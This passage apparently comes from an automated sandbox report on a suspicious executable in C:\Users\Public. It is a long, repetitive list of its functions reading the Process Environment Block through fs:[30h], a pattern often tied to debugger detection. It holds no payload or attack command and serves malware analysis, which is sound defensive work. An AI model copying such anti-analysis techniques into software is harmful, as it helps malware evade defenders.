          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013569A6 mov eax, dword ptr fs:[00000030h]29_2_013569A6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]29_2_013949A4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]29_2_013949A4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]29_2_013949A4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]29_2_013949A4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302990 mov eax, dword ptr fs:[00000030h]29_2_01302990
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304190 mov eax, dword ptr fs:[00000030h]29_2_01304190
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC182 mov eax, dword ptr fs:[00000030h]29_2_012FC182
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139A189 mov eax, dword ptr fs:[00000030h]29_2_0139A189
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139A189 mov ecx, dword ptr fs:[00000030h]29_2_0139A189
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D519E mov eax, dword ptr fs:[00000030h]29_2_012D519E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D519E mov ecx, dword ptr fs:[00000030h]29_2_012D519E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130A185 mov eax, dword ptr fs:[00000030h]29_2_0130A185
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8190 mov ecx, dword ptr fs:[00000030h]29_2_012D8190
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FD1EF mov eax, dword ptr fs:[00000030h]29_2_012FD1EF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]29_2_012DB1E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]29_2_012DB1E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]29_2_012DB1E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D31E0 mov eax, dword ptr fs:[00000030h]29_2_012D31E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A89E7 mov eax, dword ptr fs:[00000030h]29_2_013A89E7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013641E8 mov eax, dword ptr fs:[00000030h]29_2_013641E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013919D8 mov eax, dword ptr fs:[00000030h]29_2_013919D8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]29_2_012E99C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]29_2_012E99C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]29_2_012E99C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]29_2_012E99C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EC1C0 mov eax, dword ptr fs:[00000030h]29_2_012EC1C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]29_2_012EB02A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]29_2_012EB02A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]29_2_012EB02A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]29_2_012EB02A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304020 mov edi, dword ptr fs:[00000030h]29_2_01304020
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]29_2_0130002D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]29_2_0130002D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]29_2_0130002D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]29_2_0130002D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]29_2_0130002D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]29_2_012FA830
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]29_2_012FA830
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]29_2_012FA830
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]29_2_012FA830
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]29_2_01357016
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]29_2_01357016
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]29_2_01357016
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]29_2_012D6800
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]29_2_012D6800
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]29_2_012D6800
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h]29_2_013A4015
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h]29_2_013A4015
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FF86D mov eax, dword ptr fs:[00000030h]29_2_012FF86D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392073 mov eax, dword ptr fs:[00000030h]29_2_01392073
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A1074 mov eax, dword ptr fs:[00000030h]29_2_013A1074
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391843 mov eax, dword ptr fs:[00000030h]29_2_01391843
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D7057 mov eax, dword ptr fs:[00000030h]29_2_012D7057
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]29_2_012D5050
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]29_2_012D5050
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]29_2_012D5050
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h]29_2_012F0050
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h]29_2_012F0050
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]29_2_012E28AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]29_2_012E28AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]29_2_012E28AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov ecx, dword ptr fs:[00000030h]29_2_012E28AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]29_2_012E28AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]29_2_012E28AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F0BF mov ecx, dword ptr fs:[00000030h]29_2_0130F0BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h]29_2_0130F0BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h]29_2_0130F0BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]29_2_013078A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013190AF mov eax, dword ptr fs:[00000030h]29_2_013190AF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9080 mov eax, dword ptr fs:[00000030h]29_2_012D9080
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]29_2_012D3880
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]29_2_012D3880
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]29_2_01353884
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]29_2_01353884
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D58EC mov eax, dword ptr fs:[00000030h]29_2_012D58EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]29_2_012FB8E4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]29_2_012FB8E4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]29_2_012D40E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]29_2_012D40E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]29_2_012D40E1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]29_2_012E28FD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]29_2_012E28FD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]29_2_012E28FD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov ecx, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]29_2_0136B8D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]29_2_012D70C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]29_2_012D70C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013918CA mov eax, dword ptr fs:[00000030h]29_2_013918CA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]29_2_012D78D6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]29_2_012D78D6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov ecx, dword ptr fs:[00000030h]29_2_012D78D6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]29_2_0139B0C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]29_2_0139B0C7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139131B mov eax, dword ptr fs:[00000030h]29_2_0139131B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]29_2_01303B7A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]29_2_01303B7A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DDB60 mov ecx, dword ptr fs:[00000030h]29_2_012DDB60
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]29_2_01366365
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]29_2_01366365
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]29_2_01366365
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D7B70 mov eax, dword ptr fs:[00000030h]29_2_012D7B70
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]29_2_012EF370
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]29_2_012EF370
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]29_2_012EF370
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8B58 mov eax, dword ptr fs:[00000030h]29_2_013A8B58
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]29_2_01303B5A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DDB40 mov eax, dword ptr fs:[00000030h]29_2_012DDB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DF358 mov eax, dword ptr fs:[00000030h]29_2_012DF358
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A9BBE mov eax, dword ptr fs:[00000030h]29_2_013A9BBE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8BB6 mov eax, dword ptr fs:[00000030h]29_2_013A8BB6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391BA8 mov eax, dword ptr fs:[00000030h]29_2_01391BA8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]29_2_01304BAD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]29_2_01304BAD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]29_2_01304BAD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A5BA5 mov eax, dword ptr fs:[00000030h]29_2_013A5BA5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130B390 mov eax, dword ptr fs:[00000030h]29_2_0130B390
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]29_2_012E1B8F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]29_2_012E1B8F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302397 mov eax, dword ptr fs:[00000030h]29_2_01302397
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139138A mov eax, dword ptr fs:[00000030h]29_2_0139138A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]29_2_012FEB9A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]29_2_012FEB9A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138D380 mov ecx, dword ptr fs:[00000030h]29_2_0138D380
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4B94 mov edi, dword ptr fs:[00000030h]29_2_012D4B94
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov ecx, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1BE9 mov eax, dword ptr fs:[00000030h]29_2_012D1BE9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FDBE9 mov eax, dword ptr fs:[00000030h]29_2_012FDBE9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]29_2_013003E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov eax, dword ptr fs:[00000030h]29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013053C5 mov eax, dword ptr fs:[00000030h]29_2_013053C5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]29_2_013553CA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]29_2_013553CA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]29_2_012FA229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]29_2_012D4A20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]29_2_012D4A20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391229 mov eax, dword ptr fs:[00000030h]29_2_01391229
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]29_2_012D8239
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]29_2_012D8239
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]29_2_012D8239
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]29_2_01314A2C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]29_2_01314A2C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E8A0A mov eax, dword ptr fs:[00000030h]29_2_012E8A0A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov ecx, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
